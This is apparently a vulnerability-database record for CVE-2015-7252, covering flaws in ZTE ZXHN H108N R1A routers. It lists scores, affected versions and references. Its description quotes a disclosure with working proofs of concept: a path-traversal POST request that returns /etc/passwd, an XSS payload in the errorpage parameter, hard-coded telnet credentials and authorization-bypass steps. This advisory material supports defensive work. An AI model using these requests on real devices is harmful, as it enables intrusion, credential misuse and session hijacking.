        "version": "zte.bhs.zxhnh108nr1a.h_pe"
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "zte",
        "version": null
      },
      {
        "model": "zxhn h108n r1a",
        "scope": null,
        "trust": 0.8,
        "vendor": "zte",
        "version": null
      },
      {
        "model": "zxhn h108n r1a",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "zte",
        "version": "zte.bhs.zxhnh108nr1a.k_pe"
      },
      {
        "model": "zxhn h108n r1a zte.bhs.zxhnh108nr1a.h pe",
        "scope": null,
        "trust": 0.6,
        "vendor": "zte",
        "version": null
      },
      {
        "model": "zxhn h108n r1a",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "zte",
        "version": "zte.bhs.zxhnh108nr1a.h_pe"
      },
      {
        "model": "zxv10 w300 w300v1.0.0f er1 pe",
        "scope": null,
        "trust": 0.3,
        "vendor": "zte",
        "version": null
      },
      {
        "model": "zxhn h108n r1a zte.bhs.zxhnh108nr1a",
        "scope": null,
        "trust": 0.3,
        "vendor": "zte",
        "version": null
      },
      {
        "model": "zxhn h108n r1a zte.bhs.zxhnh108nr1a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "zte",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#391604"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-07627"
      },
      {
        "db": "BID",
        "id": "77421"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006591"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201511-240"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-7252"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/h:zte:zxhn_h108n_r1a",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:zte:zxhn_h108n_r1a_firmware",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006591"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Karn Ganeshen",
    "sources": [
      {
        "db": "BID",
        "id": "77421"
      },
      {
        "db": "PACKETSTORM",
        "id": "134492"
      }
    ],
    "trust": 0.4
  },
  "cve": "CVE-2015-7252",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "CVE-2015-7252",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 1.9,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "ADJACENT_NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 2.9,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 5.5,
            "id": "CNVD-2015-07627",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "LOW",
            "trust": 0.6,
            "vectorString": "AV:A/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "VHN-85213",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "exploitabilityScore": 2.8,
            "id": "CVE-2015-7252",
            "impactScore": 2.7,
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2015-7252",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "CVE-2015-7252",
            "trust": 0.8,
            "value": "Medium"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2015-07627",
            "trust": 0.6,
            "value": "LOW"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201511-240",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-85213",
            "trust": 0.1,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2015-7252",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-07627"
      },
      {
        "db": "VULHUB",
        "id": "VHN-85213"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-7252"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006591"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201511-240"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-7252"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Cross-site scripting (XSS) vulnerability in cgi-bin/webproc on ZTE ZXHN H108N R1A devices before ZTE.bhs.ZXHNH108NR1A.k_PE allows remote attackers to inject arbitrary web script or HTML via the errorpage parameter. ZTE ZXHN H108N R1A router, version ZTE.bhs.ZXHNH108NR1A.h_PE, and ZXV10 W300 router, version W300V1.0.0f_ER1_PE, contain multiple vulnerabilities. ZTE ZXHN H108N R1A is a wireless router product of China ZTE Corporation. ZTE ZXHN H108N R1A ZTE.bhs.ZXHNH108NR1A.h_PE version of webproc cgi failed to properly handle the \u0027errorpage\u0027 parameter, allowing remote attackers to exploit malicious scripts to inject malicious scripts or HTML code to obtain sensitive information or hijack when malicious data is viewed User session. ZTE ZXHN H108N R1A routers are prone to the following security vulnerabilities:\n1. Multiple information-disclosure vulnerabilities\n2. An authorization-bypass vulnerability\n3. A directory-traversal vulnerability\n4. A hard-coded credentials vulnerability\n5. A cross-site scripting vulnerability\nAttackers can exploit these issues to gain access to the browser of an  unsuspecting user and execute arbitrary script code in the context of  the affected site, steal cookie-based authentication credentials, gain access to sensitive information, read arbitrary files, or bypass security restrictions and perform unauthorized actions. This may aid in further attacks. There is a cross-site scripting vulnerability in the cgi-bin/webproc URI of ZTE ZXHN H108N R1A ZTE.bhs.ZXHNH108NR1A.h_PE and earlier versions. \n*CVE-ID*:\nCVE-2015-7248\nCVE-2015-7249\nCVE-2015-7250\nCVE-2015-7251\nCVE-2015-7252\n\n*Note*: Large deployment size, primarily in Peru, used by TdP. \n\nDescription\n*CWE-200* \u003chttps://cwe.mitre.org/data/definitions/200.html\u003e*: Information\nExposure* - CVE-2015-7248\nMultiple information exposure vulnerabilities enable an attacker to obtain\ncredentials and other sensitive details about the ZXHN H108N R1A. \nA. User names and password hashes can be viewed in the page source of\nhttp://\u003cIP\u003e/cgi-bin/webproc\n\nPoC:\n\nLogin Page source contents:\n\n...snip.... \n//get user info\nvar G_UserInfo = new Array();\nvar m = 0;\nG_UserInfo[m] = new Array();\nG_UserInfo[m][0] = \"admin\"; //UserName\nG_UserInfo[m][1] = \"$1$Tsnipped/; //Password Hash seen here\nG_UserInfo[m][2] = \"1\"; //Level\nG_UserInfo[m][3] = \"1\"; //Index\nm++;\nG_UserInfo[m] = new Array();\nG_UserInfo[m][0] = \"user\"; //UserName\nG_UserInfo[m][1] = \"$1$Tsnipped\"; //Password Hash seen here\nG_UserInfo[m][2] = \"2\"; //Level\nG_UserInfo[m][3] = \"2\"; //Index\nm++;\nG_UserInfo[m] = new Array();\nG_UserInfo[m][0] = \"support\"; //UserName\nG_UserInfo[m][1] = \"$1$Tsnipped\"; //Password Hash seen here\nG_UserInfo[m][2] = \"2\"; //Level\nG_UserInfo[m][3] = \"3\"; //Index\nm++;\n...snip... \n\nB. The configuration file of the device contains usernames, passwords,\nkeys, and other values in plain text, which can be used by a user with\nlower privileges to gain admin account access. This issue also affects ZTE\nZXV10 W300 models, version W300V1.0.0f_ER1_PE. \n\n\n*CWE-285* \u003chttps://cwe.mitre.org/data/definitions/285.html\u003e*: Improper\nAuthorization* - CVE-2015-7249\n\nBy default, only admin may authenticate directly with the web\nadministration pages in the ZXHN H108N R1A. By manipulating parameters in\nclient-side requests, an attacker may authenticate as another existing\naccount, such as user or support, and may be able to perform actions\notherwise not allowed. \n\nPoC 1:\n1. Login page user drop-down option shows only admin only. \n2. Use an intercepting proxy / Tamper Data - and intercept the Login submit\nrequest. \n3. Change the username admin to user / support and continue Login. \n4. Application permits other users to log in to mgmt portal. \n\nPoC 2:\nAfter logging in as support, some functional options are visibly\nrestricted. Certain actions can still be performed by calling the url\ndirectly. Application does not perform proper AuthZ checks. \n\nFollowing poc is a change password link. It is accessible directly, though\nit (correctly) is restricted to changing normal user (non-admin) password\nonly. \n\nhttp://\n\u003cIP\u003e/cgi-bin/webproc?getpage=html/index.html\u0026var:menu=maintenance\u0026var:page=accessctrl\u0026var:subpage=accountpsd\n\nOther functions / pages may also be accessible to non-privileged users. \n\n\n*CWE-22* \u003chttp://cwe.mitre.org/data/definitions/22.html\u003e*: Improper\nLimitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027) *-\nCVE-2015-7250\n\nThe webproc cgi module of the ZXHN H108N R1A accepts a getpage parameter\nwhich takes an unrestricted file path as input, allowing an attacker to\nread arbitrary files on the system. \n\nArbitrary files can be read off of the device. No authentication is\nrequired to exploit this vulnerability. \n\nPoC\n\nHTTP POST request\n\nPOST /cgi\u00adbin/webproc HTTP/1.1\nHost: IP\nUser\u00adAgent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101\nFirefox/18.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept\u00adLanguage: en\u00adUS,en;q=0.5\nAccept\u00adEncoding: gzip, deflate\nReferer: https://IP/cgi\u00adbin/webproc\nCookie: sessionid=7ce7bd4a; language=en_us; sys_UserName=admin\nConnection: keep\u00adalive\nContent\u00adType: application/x\u00adwww\u00adform\u00adurlencoded\nContent\u00adLength: 177\n\ngetpage=html%2Findex.html\u0026errorpage=%2fetc%2fpasswd\u0026var%3Amenu=setup\u0026var%3Apage=wancfg\u0026obj\u00ad\naction=auth\u0026%3Ausername=admin\u0026%3Apassword=admin\u0026%3Aaction=login\u0026%3Asessionid=7ce7bd4a\n\n\nHTTP Response\n\nHTTP/1.0 200 OK\nContent\u00adtype: text/html\nPragma: no\u00adcache\nCache\u00adControl: no\u00adcache\nset\u00adcookie: sessionid=7ce7bd4a; expires=Fri, 31\u00adDec\u00ad9999 23:59:59\nGMT;path=/\n\n#root:x:0:0:root:/root:/bin/bash\nroot:x:0:0:root:/root:/bin/sh\n#tw:x:504:504::/home/tw:/bin/bash\n#tw:x:504:504::/home/tw:/bin/msh\n\n\n*CWE-798* \u003chttp://cwe.mitre.org/data/definitions/798.html\u003e*: Use of\nHard-coded Credentials* - CVE-2015-7251\n\nIn the ZXHN H108N R1A, the Telnet service, when enabled, is accessible\nusing the hard-coded credentials \u0027root\u0027 for both the username and password. \n\nPoC\n\nPOST /cgi\u00adbin/webproc HTTP/1.1\nHost: IP\nUser\u00adAgent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101\nFirefox/18.0 Accept:\ntext/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept\u00adLanguage: en\u00adUS,en;q=0.5\nAccept\u00adEncoding: gzip, deflate\nReferer: https://IP/cgi\u00adbin/webproc\nCookie: sessionid=7ce7bd4a; language=en_us; sys_UserName=admin\nConnection: keep\u00adalive\nContent\u00adType: application/x\u00adwww\u00adform\u00adurlencoded\nContent\u00adLength: 177\n\ngetpage=html%2Findex.html\u0026*errorpage*=html%2fmain.html\u003cscript\u003ealert(1)\u003c/script\u003e\u0026var%3Amenu=setup\u0026var%3Apage=wancfg\u0026obj\u00ad\naction=auth\u0026%3Ausername=admin\u0026%3Apassword=admin\u0026%3Aaction=login\u0026%3Asessionid=7ce7bd4a\n\n\n\n+++++\n-- \nBest Regards,\nKarn Ganeshen\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2015-7252"
      },
      {
        "db": "CERT/CC",
        "id": "VU#391604"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006591"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-07627"
      },
      {
        "db": "BID",
        "id": "77421"
      },
      {
        "db": "VULHUB",
        "id": "VHN-85213"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-7252"
      },
      {
        "db": "PACKETSTORM",
        "id": "134492"
      }
    ],
    "trust": 3.42
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-85213",
        "trust": 0.1,
        "type": "unknown"
      },
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=38773",
        "trust": 0.1,
        "type": "exploit"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-85213"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-7252"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#391604",
        "trust": 4.3
      },
      {
        "db": "NVD",
        "id": "CVE-2015-7252",
        "trust": 3.6
      },
      {
        "db": "BID",
        "id": "77421",
        "trust": 1.5
      },
      {
        "db": "EXPLOIT-DB",
        "id": "38773",
        "trust": 1.2
      },
      {
        "db": "JVN",
        "id": "JVNVU91514956",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006591",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201511-240",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-07627",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "134492",
        "trust": 0.2
      },
      {
        "db": "SEEBUG",
        "id": "SSVID-89796",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-85213",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-7252",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#391604"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-07627"
      },
      {
        "db": "VULHUB",
        "id": "VHN-85213"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-7252"
      },
      {
        "db": "BID",
        "id": "77421"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006591"
      },
      {
        "db": "PACKETSTORM",
        "id": "134492"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201511-240"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-7252"
      }
    ]
  },
  "id": "VAR-201512-0232",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-07627"
      },
      {
        "db": "VULHUB",
        "id": "VHN-85213"
      }
    ],
    "trust": 1.7
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-07627"
      }
    ]
  },
  "last_update_date": "2024-11-23T21:43:34.301000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://www.zte.co.jp/"
      },
      {
        "title": "ZTE ZXHN H108N R1A webproc cgi module cross-site scripting vulnerability patch",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/66796"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-07627"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006591"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-79",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-85213"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006591"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-7252"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.6,
        "url": "https://www.kb.cert.org/vuls/id/391604"
      },
      {
        "trust": 2.6,
        "url": "https://www.kb.cert.org/vuls/id/bluu-9zdjwa"
      },
      {
        "trust": 1.3,
        "url": "https://www.exploit-db.com/exploits/38773/"
      },
      {
        "trust": 1.2,
        "url": "http://www.securityfocus.com/bid/77421"
      },
      {
        "trust": 0.8,
        "url": "https://cwe.mitre.org/data/definitions/200.html"
      },
      {
        "trust": 0.8,
        "url": "https://cwe.mitre.org/data/definitions/285.html"
      },
      {
        "trust": 0.8,
        "url": "https://cwe.mitre.org/data/definitions/288.html"
      },
      {
        "trust": 0.8,
        "url": "http://cwe.mitre.org/data/definitions/22.html"
      },
      {
        "trust": 0.8,
        "url": "http://cwe.mitre.org/data/definitions/798.html"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7252"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/vu/jvnvu91514956/index.html"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-7252"
      },
      {
        "trust": 0.3,
        "url": "http://www.zte.com.cn/"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/79.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://packetstormsecurity.com/files/134492/zte-zxhn-h108n-r1a-zxv10-w300-traversal-disclosure-authorization.html"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/200.html\u003e*:"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7250"
      },
      {
        "trust": 0.1,
        "url": "http://cwe.mitre.org/data/definitions/22.html\u003e*:"
      },
      {
        "trust": 0.1,
        "url": "http://cwe.mitre.org/data/definitions/798.html\u003e*:"
      },
      {
        "trust": 0.1,
        "url": "https://www.zte.com.cn]"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7249"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7252"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7248"
      },
      {
        "trust": 0.1,
        "url": "http://\u003cip\u003e/cgi-bin/webproc"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/285.html\u003e*:"
      },
      {
        "trust": 0.1,
        "url": "https://ip/cgi\u00adbin/webproc"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/79.html\u003e*:"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7251"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#391604"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-07627"
      },
      {
        "db": "VULHUB",
        "id": "VHN-85213"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-7252"
      },
      {
        "db": "BID",
        "id": "77421"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006591"
      },
      {
        "db": "PACKETSTORM",
        "id": "134492"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201511-240"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-7252"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#391604"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-07627"
      },
      {
        "db": "VULHUB",
        "id": "VHN-85213"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-7252"
      },
      {
        "db": "BID",
        "id": "77421"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006591"
      },
      {
        "db": "PACKETSTORM",
        "id": "134492"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201511-240"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-7252"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2015-11-03T00:00:00",
        "db": "CERT/CC",
        "id": "VU#391604"
      },
      {
        "date": "2015-11-17T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-07627"
      },
      {
        "date": "2015-12-30T00:00:00",
        "db": "VULHUB",
        "id": "VHN-85213"
      },
      {
        "date": "2015-12-30T00:00:00",
        "db": "VULMON",
        "id": "CVE-2015-7252"
      },
      {
        "date": "2015-11-04T00:00:00",
        "db": "BID",
        "id": "77421"
      },
      {
        "date": "2016-01-05T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-006591"
      },
      {
        "date": "2015-11-20T22:24:32",
        "db": "PACKETSTORM",
        "id": "134492"
      },
      {
        "date": "2015-11-13T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201511-240"
      },
      {
        "date": "2015-12-30T05:59:05.020000",
        "db": "NVD",
        "id": "CVE-2015-7252"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2015-11-04T00:00:00",
        "db": "CERT/CC",
        "id": "VU#391604"
      },
      {
        "date": "2015-11-17T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-07627"
      },
      {
        "date": "2017-09-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-85213"
      },
      {
        "date": "2017-09-13T00:00:00",
        "db": "VULMON",
        "id": "CVE-2015-7252"
      },
      {
        "date": "2016-02-02T20:05:00",
        "db": "BID",
        "id": "77421"
      },
      {
        "date": "2016-01-05T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-006591"
      },
      {
        "date": "2015-12-31T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201511-240"
      },
      {
        "date": "2024-11-21T02:36:26.400000",
        "db": "NVD",
        "id": "CVE-2015-7252"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201511-240"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "ZTE ZXHN H108N R1A routers contain multiple vulnerabilities",
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#391604"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "XSS",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201511-240"
      }
    ],
    "trust": 0.6
  }
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

cve-2015-7252

Vulnerability from cvelistv5

ghsa-v877-jx8x-6qr4

Vulnerability from github

gsd-2015-7252

Vulnerability from gsd

fkie_cve-2015-7252

Vulnerability from fkie_nvd

var-201512-0232

Vulnerability from variot

root:x:0:0:root:/root:/bin/bash

tw:x:504:504::/home/tw:/bin/bash

tw:x:504:504::/home/tw:/bin/msh

+++++

Tags

Sightings

Nomenclature